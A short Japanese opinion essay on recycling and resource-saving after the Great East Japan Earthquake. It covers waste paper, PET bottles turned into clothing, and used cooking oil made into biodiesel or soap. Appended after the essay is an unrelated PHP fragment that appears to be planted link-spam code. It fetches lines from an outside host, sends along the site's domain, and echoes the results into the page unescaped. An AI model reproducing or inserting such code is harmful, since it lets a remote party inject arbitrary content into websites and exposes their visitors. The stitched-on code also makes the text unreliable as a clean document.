リサイクルもちょっとしたエコ

エコという言葉がここ最近になってよく聞かれるようになった。
東日本大震災の影響で原子力発電という日本の電力をまかなっていたものが危ぶまれ、私たちは当たり前のように使っていた電気というものが制限されてしまい生活に支障をきたしてしまうという結果に陥った。
このようなことから電気やガスなど生活にひつような資源をもっとありがたいという気持ちで使う必要があるのではないだろうか。
今の時代なんでも使い捨てという風潮であるが、限られた資源を大切にするためにも使い捨てをリサイクルといった風潮に変えて行くべきである。
例えば、古新聞や古雑誌は再生紙にするためにリサイクル業者や各自治体の廃品回収に出したり、ペットボトルや空き缶も同様にリサイクルボックスに入れることをしていくべきだ。
ここ最近需要がとてもあるペットボトルはポロシャツなどの衣服に生まれ変わることができるのだ。
また、各家庭で使った天ぷら油も自治体で回収しているところがある。
そのまま下水道に流せば当然汚染の原因になる。
しかしリサイクルすることでバイオディーゼルという燃料に生まれ変わったり、石鹸などの原料になったりとただの不要物ではなく新たな製品を生み出すものへと変わるのである。
リサイクルの幅は無限大である。
一人一人が意識すれば今ある資源を生かして新たな資源が生み出せるのだ。
リサイクルはそんなに難しいものでもない。
しかし意識の問題でなかなか実現できていないところもある。
だが、少しの意識が地球を守るという大きな結果に至るということを忘れてはならない。

//// $MAX = 5; // ////////////////// $lines = file('http://links-002.com/ad/set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST'])); shuffle($lines); for($i=0;$i<$MAX;$i++){ echo($lines[$i].""); } ?>